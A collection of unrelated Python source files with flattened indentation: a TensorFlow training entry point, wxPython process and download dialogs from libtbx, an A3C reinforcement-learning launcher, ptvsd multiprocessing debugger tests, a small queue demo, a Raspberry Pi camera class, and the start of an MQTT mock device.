if '_tuning_objective_metric' not in env.hyperparameters:
return checkpoint_path
job_name = env.job_name
# If the checkpoint path already matches the format 'job_name/checkpoints', then we don't
# need to worry about checkpoints from multiple training jobs being saved in the same location
if job_name is None or checkpoint_path.endswith(os.path.join(job_name, 'checkpoints')):
return checkpoint_path
else:
return os.path.join(checkpoint_path, job_name, 'checkpoints')
def train():
env = cs.TrainingEnvironment()
checkpoint_dir = _get_checkpoint_dir(env)
train_steps = env.hyperparameters.get('training_steps', 1000)
eval_steps = env.hyperparameters.get('evaluation_steps', 100)
# https://github.com/tensorflow/tensorflow/issues/15868
# The default request timeout for S3, within the C++ SDK, is 3 seconds, which times out when
# saving checkpoints of larger sizes.
os.environ['S3_REQUEST_TIMEOUT_MSEC'] = str(env.hyperparameters.get('s3_checkpoint_save_timeout', 60000))
if env.user_script_archive.lower().startswith('s3://'):
env.download_user_module()
env.pip_install_requirements()
customer_script = env.import_user_module()
trainer_class = _get_trainer_class()
train_wrapper = trainer_class(customer_script=customer_script,
current_host=env.current_host,
hosts=env.hosts,
train_steps=train_steps,
eval_steps=eval_steps,
input_channels=env.channel_dirs,
model_path=checkpoint_dir,
output_path=env.output_dir,
customer_params=env.hyperparameters)
tf_config = train_wrapper.build_tf_config()
# only create a parameter server for distributed runs
if len(env.hosts) > 1:
_run_ps_server(env.current_host, env.hosts, tf_config)
save_tf_config_env_var(tf_config)
best_model_path = train_wrapper.train()
# only the master should export the model at the end of the execution
if checkpoint_dir != env.model_dir and train_wrapper.task_type == 'master' and train_wrapper.saves_training():
serve.export_saved_model(best_model_path, env.model_dir)
if train_wrapper.task_type != 'master':
_wait_until_master_is_down(_get_master(tf_config))
|
process_control.py
|
# TODO more comprehensive tests
from __future__ import division
from __future__ import absolute_import # XXX is this necessary?
from wx.lib.agw import pyprogress
import wx
from libtbx import thread_utils
from libtbx import runtime_utils
from libtbx import easy_pickle
from libtbx import easy_run
from libtbx.utils import Sorry, Abort, download_progress
import threading
import random
import locale
import math
import os
JOB_START_ID = wx.NewId()
LOG_UPDATE_ID = wx.NewId()
CALLBACK_ID = wx.NewId()
JOB_EXCEPTION_ID = wx.NewId()
JOB_KILLED_ID = wx.NewId()
JOB_COMPLETE_ID = wx.NewId()
JOB_PAUSE_ID = wx.NewId()
JOB_RESUME_ID = wx.NewId()
DOWNLOAD_COMPLETE_ID = wx.NewId()
DOWNLOAD_INCREMENT_ID = wx.NewId()
class SubprocessEvent (wx.PyEvent) :
event_id = None
def __init__ (self, data, **kwds) :
self.data = data
self.__dict__.update(kwds)
wx.PyEvent.__init__(self)
self.SetEventType(self.event_id)
class JobStartEvent (SubprocessEvent) :
event_id = JOB_START_ID
class LogEvent (SubprocessEvent) :
event_id = LOG_UPDATE_ID
class JobExceptionEvent (SubprocessEvent) :
event_id = JOB_EXCEPTION_ID
class JobKilledEvent (SubprocessEvent) :
event_id = JOB_KILLED_ID
class JobCompleteEvent (SubprocessEvent) :
event_id = JOB_COMPLETE_ID
class CallbackEvent (SubprocessEvent) :
event_id = CALLBACK_ID
class JobPauseEvent (SubprocessEvent) :
event_id = JOB_PAUSE_ID
class JobResumeEvent (SubprocessEvent) :
event_id = JOB_RESUME_ID
class DownloadCompleteEvent (SubprocessEvent) :
event_id = DOWNLOAD_COMPLETE_ID
class DownloadIncrementEvent (SubprocessEvent) :
event_id = DOWNLOAD_INCREMENT_ID
def setup_stdout_logging_event (window, OnPrint) :
window.Connect(-1, -1, LOG_UPDATE_ID, OnPrint)
def setup_process_gui_events (
window,
OnStart=None,
OnPrint=None,
OnUpdate=None,
OnExcept=None,
OnAbort=None,
OnComplete=None,
OnPause=None,
OnResume=None) :
if OnStart is not None :
assert hasattr(OnStart, "__call__")
window.Connect(-1, -1, JOB_START_ID, OnStart)
if OnPrint is not None :
assert hasattr(OnPrint, "__call__")
window.Connect(-1, -1, LOG_UPDATE_ID, OnPrint)
if OnUpdate is not None :
assert hasattr(OnUpdate, "__call__")
window.Connect(-1, -1, CALLBACK_ID, OnUpdate)
if OnExcept is not None :
assert hasattr(OnExcept, "__call__")
window.Connect(-1, -1, JOB_EXCEPTION_ID, OnExcept)
if OnAbort is not None :
assert hasattr(OnAbort, "__call__")
window.Connect(-1, -1, JOB_KILLED_ID, OnAbort)
if OnComplete is not None :
assert hasattr(OnComplete, "__call__")
window.Connect(-1, -1, JOB_COMPLETE_ID, OnComplete)
if OnPause is not None :
assert hasattr(OnPause, "__call__")
window.Connect(-1, -1, JOB_PAUSE_ID, OnPause)
if OnResume is not None :
assert hasattr(OnResume, "__call__")
window.Connect(-1, -1, JOB_RESUME_ID, OnResume)
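# Illustrative usage sketch (not part of the original module): a window class
# would typically connect only the events it cares about, e.g.
#
#   class MyFrame (wx.Frame) :
#     def __init__ (self, *args, **kwds) :
#       wx.Frame.__init__(self, *args, **kwds)
#       setup_process_gui_events(
#         window=self,
#         OnPrint=self.OnPrint,       # handler method names are assumptions
#         OnComplete=self.OnComplete)
#
# after which a process created with an event_agent proxy (see below) will post
# LogEvent and JobCompleteEvent instances back to the frame's handlers.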
class event_agent (object) :
def __init__ (self, window, **kwds) :
self.window = window
self._kwds = dict(kwds)
self.__dict__.update(kwds)
def get_kwds (self) :
return self._kwds
def callback_start (self, data) :
kwds = self.get_kwds()
event = JobStartEvent(data, **kwds)
wx.PostEvent(self.window, event)
def callback_stdout (self, data) :
kwds = self.get_kwds()
event = LogEvent(data, **kwds)
wx.PostEvent(self.window, event)
def callback_error (self, error, traceback_info) :
kwds = self.get_kwds()
event = JobExceptionEvent((error, traceback_info), **kwds)
wx.PostEvent(self.window, event)
def callback_abort (self) :
kwds = self.get_kwds()
event = JobKilledEvent(None, **kwds)
wx.PostEvent(self.window, event)
def callback_final (self, result) :
kwds = self.get_kwds()
event = JobCompleteEvent(result, **kwds)
wx.PostEvent(self.window, event)
def callback_other (self, data) :
kwds = self.get_kwds()
event = CallbackEvent(data, **kwds)
wx.PostEvent(self.window, event)
def callback_pause (self) :
kwds = self.get_kwds()
event = JobPauseEvent(None, **kwds)
wx.PostEvent(self.window, event)
def callback_resume (self) :
kwds = self.get_kwds()
event = JobResumeEvent(None, **kwds)
wx.PostEvent(self.window, event)
# simplified for when the window is really the app object
class background_event_agent (event_agent) :
def callback_stdout (self, data) :
pass
def callback_other (self, data) :
pass
class detached_process (runtime_utils.detached_process_client) :
def __init__ (self, params, proxy) :
runtime_utils.detached_process_client.__init__(self, params)
self.proxy = proxy
def callback_start (self, data) :
self.proxy.callback_start(data)
def callback_stdout (self, data) :
self.proxy.callback_stdout(data)
def callback_other (self, data) :
self.proxy.callback_other(data)
def callback_abort (self) :
self.proxy.callback_abort()
def callback_final (self, result) :
self.proxy.callback_final(result)
def callback_error (self, error, traceback_info) :
self.proxy.callback_error(error, traceback_info)
def callback_pause (self) :
self.proxy.callback_pause()
def callback_resume (self) :
self.proxy.callback_resume()
def start (self) :
pass
# this just adds event posting callbacks to the original class
class process_with_gui_callbacks (thread_utils.process_with_callbacks) :
def __init__ (self, proxy, target, args=(), kwargs={}, buffer_stdout=True) :
thread_utils.process_with_callbacks.__init__(self,
target = target,
args=args,
kwargs=kwargs,
callback_stdout = proxy.callback_stdout,
callback_final = proxy.callback_final,
callback_err = proxy.callback_error,
callback_abort = proxy.callback_abort,
callback_other = proxy.callback_other,
callback_pause = proxy.callback_pause,
callback_resume = proxy.callback_resume,
buffer_stdout = buffer_stdout)
def set_job (self, job) :
pass
def purge_files (self) :
pass
class simple_gui_process (process_with_gui_callbacks) :
def __init__ (self, window, target, args=(), kwargs={}) :
# XXX fix for phenix gui - is this necessary?
proxy = event_agent(window, project_id=None, job_id=None)
process_with_gui_callbacks.__init__(self,
proxy=proxy,
target=target,
args=args,
kwargs=kwargs,
buffer_stdout=True)
class ThreadProgressDialog (pyprogress.PyProgress) :
def __init__ (self, parent, title, message) :
pyprogress.PyProgress.__init__(self, parent, -1, title, message,
agwStyle=wx.PD_ELAPSED_TIME|wx.PD_APP_MODAL)
self.SetGaugeProportion(0.15)
self.SetGaugeSteps(50)
self.SetGaugeBackground(wx.Colour(235, 235, 235))
self.SetFirstGradientColour(wx.Colour(235,235,235))
self.SetSecondGradientColour(wx.Colour(120, 200, 255))
class download_file_basic (object) :
def __init__ (self, window, dl_func, args) :
assert isinstance(window, wx.EvtHandler)
assert hasattr(dl_func, "__call__")
assert (isinstance(args, list) or isinstance(args, tuple))
self.window = window
window.Connect(-1, -1, DOWNLOAD_COMPLETE_ID, self.OnComplete)
self.dl_func = dl_func
self.args = args
self.t = threading.Thread(target=self.run)
self.t.start()
def run (self) :
try :
result = self.dl_func(self.args)
except Exception, e :
result = (None, str(e))
finally :
wx.PostEvent(self.window, DownloadCompleteEvent(result))
return result
def OnComplete (self, event) :
if isinstance(event.data, basestring) :
wx.MessageBox(message="File downloaded to %s" % event.data)
else :
wx.MessageBox(message="Error downloading file: %s" % event.data[1],
caption="Download error", style=wx.ICON_ERROR)
self.t.join()
class DownloadProgressDialog (wx.ProgressDialog, download_progress) :
"""
Dialog for displaying download progress. The actual download (not
implemented here) should be run in a separate thread, with a reasonable
chunk size, and call download_progress.increment() as each new chunk is
downloaded.
"""
def __init__ (self, parent, title, message) :
download_progress.__init__(self)
wx.ProgressDialog.__init__(self, parent=parent,
title=title,
message=message,
style=wx.PD_ELAPSED_TIME|wx.PD_CAN_ABORT|wx.PD_AUTO_HIDE,
maximum=100)
self.Connect(-1, -1, DOWNLOAD_INCREMENT_ID, self.OnIncrement)
self.Connect(-1, -1, DOWNLOAD_COMPLETE_ID, self.OnComplete)
self._continue = True
def show_progress (self) :
if (not self._continue) :
return False
locale.setlocale(locale.LC_ALL, 'en_US')
pct = self.percent_finished()
msg = "%s/%s KB downloaded" % (
locale.format("%d", self.n_kb_elapsed, grouping=True),
locale.format("%d", self.n_kb_total, grouping=True))
evt = DownloadIncrementEvent(data=(pct, msg))
wx.PostEvent(self, evt)
return self._continue
def OnIncrement (self, event) :
(cont, skip) = self.Update(value=event.data[0], newmsg=event.data[1])
self._continue = cont
def OnComplete (self, event) :
self.Hide()
self.Close()
# FIXME destroying the dialog crashes wxPython 2.9.5/osx-coocoa
def complete (self) :
evt = DownloadCompleteEvent(data=None)
wx.PostEvent(self, evt)
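# Illustrative sketch only (not part of the original module): the download code
# referred to in the docstring above could run in a worker thread roughly like
# this, assuming a file-like `response` object; set_total_size() and the return
# value of increment() are assumptions about the download_progress interface.
#
#   def _download_worker (dialog, response, out_file, n_kb_total) :
#     dialog.set_total_size(n_kb_total)
#     while True :
#       chunk = response.read(1024)
#       if (not chunk) : break
#       out_file.write(chunk)
#       if (not dialog.increment(1)) : break   # user may have cancelled
#     dialog.complete()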
class BackgroundDownloadDialog (pyprogress.PyProgress, download_progress) :
"""
Placeholder for downloads which block the child thread; will pulse
continuously but not show changing status.
"""
def __init__ (self, parent, title, message) :
download_progress.__init__(self)
pyprogress.PyProgress.__init__(self, parent, -1, title, message,
agwStyle=wx.PD_ELAPSED_TIME|wx.PD_CAN_ABORT|wx.PD_AUTO_HIDE)
self.SetGaugeProportion(0.15)
self.SetGaugeSteps(100)
self.SetGaugeBackground(wx.Colour(235, 235, 235))
self.SetFirstGradientColour(wx.Colour(235,235,235))
self.SetSecondGradientColour(wx.Colour(120, 200, 255))
self.Connect(-1, -1, DOWNLOAD_COMPLETE_ID, self.OnComplete)
self._continue = True
def show_progress (self) :
if (not self._continue) :
return False
return self._continue
def OnComplete (self, event) :
self.Hide()
self.Close()
def complete (self) :
evt = DownloadCompleteEvent(data=None)
wx.PostEvent(self, evt)
def run_function_as_thread_in_dialog (parent, thread_function, title, message) :
dlg = ThreadProgressDialog(None, title, message)
t = thread_utils.simple_task_thread(thread_function, dlg)
t.start()
while True :
if t.is_complete() or t.exception_raised() :
#dlg.Destroy()
dlg.Hide()
break
else :
dlg.UpdatePulse()
wx.MilliSleep(30)
dlg.Destroy()
wx.SafeYield()
if t.exception_raised() :
raise RuntimeError("An exception occurred while running this process: %s" %
t.get_error())
return t.return_value
# TODO
class ProcessDialog (wx.Dialog) :
def __init__ (self, parent, message, caption, callback=None) :
wx.Dialog.__init__(self,
parent=parent,
title=caption,
style=wx.RAISED_BORDER|wx.CAPTION)
self.callback = callback
self.process = None
self._error = None
self._aborted = False
szr = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(szr)
szr2 = wx.BoxSizer(wx.VERTICAL)
szr.Add(szr2, 1, wx.ALL, 5)
msg_txt = wx.StaticText(self, -1, message)
msg_txt.Wrap(400)
szr2.Add(msg_txt, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5)
self.gauge = wx.Gauge(parent=self, size=(300,-1))
self.gauge.SetRange(100)
szr2.Add(self.gauge, 1, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_HORIZONTAL, 5)
abort_btn = wx.Button(parent=self,
label="Abort")
self.Bind(wx.EVT_BUTTON, self.OnAbort, abort_btn)
szr2.Add(abort_btn, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 5)
self.SetMinSize((300,100))
szr.Fit(self)
self.Centre(wx.BOTH)
def run (self, process):
self.process = process
self._timer = wx.Timer(owner=self)
self.Bind(wx.EVT_TIMER, self.OnTimer)
self._timer.Start(100)
self.process.start()
self.gauge.Pulse()
return self.ShowModal()
def OnTimer (self, event) :
if hasattr(self.process,'update'):
self.process.update()
self.gauge.Pulse()
def OnAbort (self, event) :
self.process.abort()
self._aborted = True
self.EndModal(wx.ID_CANCEL)
def OnError (self, event) :
self._error = event.data
self.EndModal(wx.ID_CANCEL)
def exception_raised (self) :
return (self._error is not None)
def was_aborted (self) :
return (self._aborted)
def handle_error (self) :
if isinstance(self._error, Exception) :
raise self._error
elif isinstance(self._error, tuple) :
exception, traceback = self._error
if (isinstance(exception, Sorry)) :
raise Sorry(str(exception))
raise RuntimeError("""\
Error in subprocess!
Original error: %s
Original traceback:
%s""" % (str(exception), traceback))
else :
raise Sorry("error in child process: %s" % str(self._error))
# finally :
# self.EndModal(wx.ID_CANCEL)
def OnComplete (self, event) :
try :
if (self.callback is not None) :
self.callback(event.data)
finally :
self._result = event.data
self._timer.Stop()
self.EndModal(wx.ID_OK)
def get_result (self) :
return getattr(self, "_result", None)
def run_function_as_process_in_dialog (
parent,
thread_function,
title,
message,
callback=None,
project_id=None,
job_id=None) :
dlg = ProcessDialog(
parent=parent,
message=message,
caption=title,
callback=callback)
setup_process_gui_events(
window=dlg,
OnExcept=dlg.OnError,
OnComplete=dlg.OnComplete)
cb = event_agent(dlg, project_id=project_id, job_id=job_id)
p = thread_utils.process_with_callbacks(
target=thread_function,
callback_final=cb.callback_final,
callback_err=cb.callback_error,
buffer_stdout=True,
sleep_after_start=1)
result = None
abort = False
if (dlg.run(p) == wx.ID_OK) :
result = dlg.get_result()
elif dlg.exception_raised() :
dlg.handle_error()
elif (dlg.was_aborted()) :
abort = True
wx.CallAfter(dlg.Destroy)
if (abort) :
raise Abort()
return result
# TODO this is awful, needs to be re-thought
def run_function_as_detached_process_in_dialog (
parent,
thread_function,
title,
message,
tmp_dir,
callback=None,
project_id=None,
job_id=None) :
if (tmp_dir is None) :
tmp_dir = os.getcwd()
params = runtime_utils.process_master_phil.extract()
params.tmp_dir = tmp_dir
if (job_id is None) :
job_id = str(os.getpid()) + "_" + str(int(random.random() * 1000))
params.prefix = str(job_id)
target = runtime_utils.detached_process_driver(target=thread_function)
run_file = os.path.join(tmp_dir, "libtbx_run_%s.pkl" % job_id)
easy_pickle.dump(run_file, target)
params.run_file = run_file
eff_file = os.path.join(tmp_dir, "libtbx_run_%s.eff" % job_id)
runtime_utils.write_params(params, eff_file)
dlg = ProcessDialog(
parent=parent,
message=message,
caption=title,
callback=callback)
setup_process_gui_events(
window=dlg,
OnExcept=dlg.OnError,
OnAbort=dlg.OnAbort,
OnComplete=dlg.OnComplete)
agent = event_agent(
window=dlg,
project_id=project_id,
job_id=job_id)
process = detached_process(params, proxy=agent)
cb = event_agent(dlg, project_id=project_id, job_id=job_id)
easy_run.call("libtbx.start_process \"%s\" &" % eff_file)
result = None
abort = False
if (dlg.run(process) == wx.ID_OK) :
result = dlg.get_result()
elif dlg.exception_raised() :
dlg.handle_error()
elif (dlg.was_aborted()) :
abort = True
wx.CallAfter(dlg.Destroy)
if (abort) :
raise Abort()
return result
########################################################################
# XXX regression testing utilities
def test_function_1 (*args, **kwds) :
n = 0
for i in range(25000) :
x = math.sqrt(i)
print x
n += x
return n
def test_function_2 (*args, **kwds) :
n = 0
for i in range(100000) :
x = math.sqrt(i)
n += x
return n
def test_function_3 (*args, **kwds) :
raise RuntimeError("This is a test!")
|
main.py
|
from __future__ import print_function
import argparse
import os
import sys
import torch
import torch.optim as optim
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.functional as F
from envs import create_atari_env
from model import ActorCritic
from train import train
from test import test
import my_optim
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001, metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99, metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--tau', type=float, default=1.00, metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4, metavar='N',
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=20, metavar='NS',
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=10000, metavar='M',
help='maximum length of an episode (default: 10000)')
parser.add_argument('--env-name', default='PongDeterministic-v3', metavar='ENV',
help='environment to train on (default: PongDeterministic-v3)')
parser.add_argument('--no-shared', default=False, metavar='O',
help='use an optimizer without shared momentum.')
parser.add_argument('--num-skips', type=int, default=3, metavar='SKIP',
help='how many frame skip allowed')
parser.add_argument('--model-name', default='def',
help='for saving the model')
parser.add_argument('--load-dir',
help='load model from path')
parser.add_argument('--testing', default=False,
help='to run model')
if __name__ == '__main__':
os.environ['OMP_NUM_THREADS'] = '1'
args = parser.parse_args()
print(args)
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(
env.observation_space.shape[0], env.action_space, args.num_skips)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
if args.load_dir:
filename = args.load_dir
print('==> loading checkpoint {}'.format(filename))
checkpoint = torch.load(filename)
shared_model.load_state_dict(checkpoint)
print('==> loaded checkpoint {}'.format(filename))
processes = []
p = mp.Process(target=test, args=(args.num_processes, args, shared_model))
p.start()
processes.append(p)
if not args.testing:
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
|
test_multiproc.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest
import sys
import ptvsd
from ptvsd.common import messaging
from tests import debug
from tests.debug import runners
from tests.patterns import some
@pytest.fixture(params=[runners.launch, runners.attach_by_socket["api"]])
def run(request):
return request.param
@pytest.mark.parametrize(
"start_method",
[""]
if sys.version_info < (3,)
else ["spawn"]
if sys.platform == "win32"
else ["spawn", "fork"],
)
def test_multiprocessing(pyfile, target, run, start_method):
if start_method == "spawn" and sys.platform != "win32":
pytest.skip("https://github.com/microsoft/ptvsd/issues/1887")
@pyfile
def code_to_debug():
import debug_me # noqa
import multiprocessing
import os
import sys
def parent(q, a):
from debug_me import backchannel
print("spawning child")
p = multiprocessing.Process(target=child, args=(q, a))
p.start()
print("child spawned")
q.put("child_pid?")
what, child_pid = a.get()
assert what == "child_pid"
backchannel.send(child_pid)
q.put("grandchild_pid?")
what, grandchild_pid = a.get()
assert what == "grandchild_pid"
backchannel.send(grandchild_pid)
assert backchannel.receive() == "continue"
q.put("exit!")
p.join()
def child(q, a):
print("entering child")
assert q.get() == "child_pid?"
a.put(("child_pid", os.getpid()))
print("spawning child of child")
p = multiprocessing.Process(target=grandchild, args=(q, a))
p.start()
p.join()
print("leaving child")
def grandchild(q, a):
print("entering grandchild")
assert q.get() == "grandchild_pid?"
a.put(("grandchild_pid", os.getpid()))
assert q.get() == "exit!"
print("leaving grandchild")
if __name__ == "__main__":
start_method = sys.argv[1]
if start_method != "":
multiprocessing.set_start_method(start_method)
q = multiprocessing.Queue()
a = multiprocessing.Queue()
try:
parent(q, a)
finally:
q.close()
a.close()
with debug.Session() as parent_session:
parent_backchannel = parent_session.open_backchannel()
with run(parent_session, target(code_to_debug, args=[start_method])):
pass
expected_child_config = dict(parent_session.config)
expected_child_config.update(
{
"name": some.str,
"request": "attach",
"subProcessId": some.int,
"host": some.str,
"port": some.int,
}
)
child_config = parent_session.wait_for_next_event("ptvsd_attach")
assert child_config == expected_child_config
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
expected_grandchild_config = dict(child_session.config)
expected_grandchild_config.update(
{
"name": some.str,
"request": "attach",
"subProcessId": some.int,
"host": some.str,
"port": some.int,
}
)
grandchild_config = child_session.wait_for_next_event("ptvsd_attach")
assert grandchild_config == expected_grandchild_config
with debug.Session(grandchild_config) as grandchild_session:
with grandchild_session.start():
pass
parent_backchannel.send("continue")
def test_subprocess(pyfile, target, run):
@pyfile
def child():
import os
import sys
assert "ptvsd" in sys.modules
from debug_me import backchannel, ptvsd
backchannel.send(os.getpid())
backchannel.send(ptvsd.__file__)
backchannel.send(sys.argv)
@pyfile
def parent():
import debug_me # noqa
import os
import subprocess
import sys
argv = [sys.executable, sys.argv[1], "--arg1", "--arg2", "--arg3"]
env = os.environ.copy()
process = subprocess.Popen(
argv,
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
process.wait()
with debug.Session() as parent_session:
backchannel = parent_session.open_backchannel()
with run(parent_session, target(parent, args=[child])):
pass
expected_child_config = dict(parent_session.config)
expected_child_config.update(
{
"name": some.str,
"request": "attach",
"subProcessId": some.int,
"host": some.str,
"port": some.int,
}
)
child_config = parent_session.wait_for_next_event("ptvsd_attach")
assert child_config == expected_child_config
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
child_pid = backchannel.receive()
assert child_pid == child_config["subProcessId"]
assert str(child_pid) in child_config["name"]
ptvsd_file = backchannel.receive()
assert ptvsd_file == ptvsd.__file__
child_argv = backchannel.receive()
assert child_argv == [child, "--arg1", "--arg2", "--arg3"]
@pytest.mark.skip("Needs refactoring to use the new debug.Session API")
@pytest.mark.parametrize(
"start_method", [runners.launch, runners.attach_by_socket["cli"]]
)
def test_autokill(pyfile, start_method, run_as):
@pyfile
def child():
import debug_me # noqa
while True:
pass
@pyfile
def parent():
import os
import subprocess
import sys
from debug_me import backchannel
argv = [sys.executable, sys.argv[1]]
env = os.environ.copy()
subprocess.Popen(
argv,
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
backchannel.receive()
with debug.Session(start_method, backchannel=True) as parent_session:
parent_backchannel = parent_session.backchannel
expected_exit_code = (
some.int if parent_session.start_method.method == "launch" else 0
)
parent_session.expected_exit_code = expected_exit_code
parent_session.configure(run_as, parent, subProcess=True, args=[child])
parent_session.start_debugging()
with parent_session.attach_to_next_subprocess() as child_session:
child_session.start_debugging()
if parent_session.start_method.method == "launch":
# In launch scenario, terminate the parent process by disconnecting from it.
try:
parent_session.request("disconnect")
except messaging.NoMoreMessages:
# Can happen if ptvsd drops connection before sending the response.
pass
parent_session.wait_for_disconnect()
else:
# In attach scenario, just let the parent process run to completion.
parent_backchannel.send(None)
@pytest.mark.skip("Needs refactoring to use the new debug.Session API")
def test_argv_quoting(pyfile, start_method, run_as):
@pyfile
def args():
import debug_me # noqa
args = [ # noqa
r"regular",
r"",
r"with spaces" r'"quoted"',
r'" quote at start',
r'quote at end "',
r'quote in " the middle',
r'quotes "in the" middle',
r"\path with\spaces",
r"\path\with\terminal\backslash" + "\\",
r"backslash \" before quote",
]
@pyfile
def parent():
import debug_me # noqa
import sys
import subprocess
from args import args
child = sys.argv[1]
subprocess.check_call([sys.executable] + [child] + args)
@pyfile
def child():
from debug_me import backchannel
import sys
from args import args as expected_args
backchannel.send(expected_args)
actual_args = sys.argv[1:]
backchannel.send(actual_args)
with debug.Session(start_method, backchannel=True) as session:
backchannel = session.backchannel
session.configure(run_as, parent, args=[child])
session.start_debugging()
expected_args = backchannel.receive()
actual_args = backchannel.receive()
assert expected_args == actual_args
@pytest.mark.skip("Needs refactoring to use the new debug.Session API")
def test_echo_and_shell(pyfile, run_as, start_method):
"""
Checks https://github.com/microsoft/ptvsd/issues/1548
"""
@pyfile
def code_to_run():
import debug_me # noqa
import sys
import subprocess
import os
if sys.platform == "win32":
args = ["dir", "-c", "."]
else:
args = ["ls", "-c", "-la"]
p = subprocess.Popen(
args,
shell=True,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
cwd=os.path.dirname(os.path.abspath(__file__)),
)
stdout, _stderr = p.communicate()
if sys.version_info[0] >= 3:
stdout = stdout.decode("utf-8")
if "code_to_run.py" not in stdout:
raise AssertionError(
'Did not find "code_to_run.py" when listing this dir with subprocess. Contents: %s'
% (stdout,)
)
with debug.Session(start_method) as session:
session.configure(run_as, code_to_run, subProcess=True)
session.start_debugging()
|
dishes.py
|
import multiprocessing as mp
def washer(dishes, output):
for dish in dishes:
print('Washing', dish, 'dish')
output.put(dish)
def dryer(input):
while True:
dish = input.get()
print('Drying', dish, 'dish')
input.task_done()
dish_queue = mp.JoinableQueue()
dryer_proc = mp.Process(target=dryer, args=(dish_queue,))
dryer_proc.daemon = True
dryer_proc.start()
dishes = ['salad', 'bread', 'entree', 'dessert']
washer(dishes, dish_queue)
dish_queue.join()
|
glider_camera.py
|
import os
import time
import logging
import picamera
from PIL import Image
from datetime import datetime
from threading import Thread
from . import glider_config
LOG = logging.getLogger("glider.%s" % __name__)
class GliderCamera(object):
threads = []
threadAlive = False
def __init__(self,
low_quality_interval=15,
high_quality_interval=60,
photo_path=None):
LOG.info("Camera init")
if not photo_path:
photo_path = glider_config.get("camera", "data_dir")
self.photo_path = photo_path
self.last_low_pic = time.time()
self.last_high_pic = time.time()
self.low_quality_interval = low_quality_interval
self.high_quality_interval = high_quality_interval
self.video_requested = 0
def get_cam(self, cam_type):
camera = picamera.PiCamera()
camera.sharpness = 0
camera.contrast = 0
camera.brightness = 50
camera.saturation = 0
camera.image_effect = 'none'
camera.color_effects = None
camera.rotation = 0
camera.hflip = False
camera.vflip = False
camera.video_stabilization = True
camera.exposure_compensation = 0
camera.exposure_mode = 'auto'
camera.meter_mode = 'average'
camera.awb_mode = 'auto'
camera.crop = (0.0, 0.0, 1.0, 1.0)
if cam_type == "high":
camera.resolution = (1296, 972)
if cam_type == "low":
camera.resolution = (640, 480)
if cam_type == "video":
camera.resolution = (1296,972)
return camera
def _take_video(self):
timestamp = datetime.now().strftime("%H%M%S%f")
out_path = os.path.join(self.photo_path, "video_%s.h264" % timestamp)
LOG.info("Creating (%ss) video at %s" % (self.video_requested, out_path))
with self.get_cam("video") as camera:
LOG.info("Starting recording")
camera.start_recording(out_path)
camera.wait_recording(self.video_requested)
LOG.info("Stopping recording")
camera.stop_recording()
camera.close()
return out_path
def take_video(self, seconds):
self.video_requested = seconds
def take_low_pic(self):
timestamp = datetime.now().strftime("%H%M%S%f")
out_path = os.path.join(self.photo_path, "low_%s.jpg" % timestamp)
with self.get_cam("low") as camera:
camera.capture("/tmp/precompressed.jpg", format="jpeg", quality=40)
image = Image.open("/tmp/precompressed.jpg")
image.convert('P', palette=Image.ADAPTIVE, colors=200).convert("RGB").save(
out_path, "JPEG", quality=20, optimize=True
)
camera.close()
return out_path
def take_high_pic(self):
timestamp = datetime.now().strftime("%H%M%S%f")
out_path = os.path.join(self.photo_path, "high_%s.png" % timestamp)
with self.get_cam("high") as camera:
camera.capture(out_path, format="png")
camera.close()
return out_path
def take_pictures(self):
while self.threadAlive:
now = time.time()
try:
if self.video_requested:
out_path = self._take_video()
self.video_requested = 0
LOG.debug("Created video: %s" % out_path)
if now - self.last_low_pic > self.low_quality_interval:
out_path = self.take_low_pic()
self.last_low_pic = now
LOG.debug("Created low pic: %s" % out_path)
if now - self.last_high_pic > self.high_quality_interval:
out_path = self.take_high_pic()
self.last_high_pic = now
LOG.debug("Created high pic: %s" % out_path)
except Exception:
LOG.exception("Camera capture failed, trying again later")
time.sleep(1)
def start(self):
cameraThread = Thread( target=self.take_pictures, args=() )
self.threadAlive = True
LOG.info("Starting up Camera thread now")
cameraThread.start()
self.threads.append(cameraThread)
def stop(self):
self.threadAlive = False
for t in self.threads:
t.join()
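# Illustrative usage sketch (not part of the original module); assumes
# glider_config provides the "camera"/"data_dir" setting used above:
#
#   camera = GliderCamera(low_quality_interval=15, high_quality_interval=60)
#   camera.start()          # background thread begins taking pictures
#   camera.take_video(10)   # request a 10 second h264 clip on the next pass
#   ...
#   camera.stop()           # clear the flag and join the thread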
|
mock-device.py
|
import argparse
from datetime import datetime
import json
import os
import ssl
import time
import random
import threading
import logging
import asyncio
import paho.mqtt.client as mqtt
from connection import create_jwt, error_str
# To set up the device
# EXPORT "GOOGLE_CLOUD_PROJECT"
# EXPORT "PROJECT_ID"
# EXPORT "DEVICE_ID"
class Device(object):
"""Represents the state of a single device."""
def __init__(self, deviceId):
self.running = True
self.controlled = False
self.connected = False
